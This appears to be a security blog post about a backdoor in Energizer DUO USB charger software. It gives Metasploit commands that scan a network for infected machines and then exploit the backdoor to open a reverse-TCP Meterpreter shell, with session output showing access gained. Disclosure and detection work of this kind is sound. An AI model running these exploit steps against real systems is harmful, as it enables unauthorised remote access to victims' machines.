The newsophere was abuzz this morning with the discovery that Energizer's "DUO" USB Battery Charger included a malicious backdoor in the accompanying software. This backdoor was only discovered after the product was discontinued, leading some to believe that it went through its entire lifecycle undetected. The good news is that the backdoor is relatively harmless; machines behind the corporate firewall, or those with a local firewall installed, should prevent access to the listener on port 7777. The backdoor makes no outbound connections and  uninstalling the USB Charger software package clears the system.

As of this afternoon, you can now use Metasploit to locate infected systems on the local network. After downloading a copy of Metasploit and updating it to revision 8749 or newer, the following commands can be used to scan the local network:

$ msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
 
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
 
[*] Started reverse handler on 192.168.0.228:4444 
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
 
meterpreter > getuid
Server username: XPDEV\Developer

A copy of the malware can be obtained from the Wayback Machine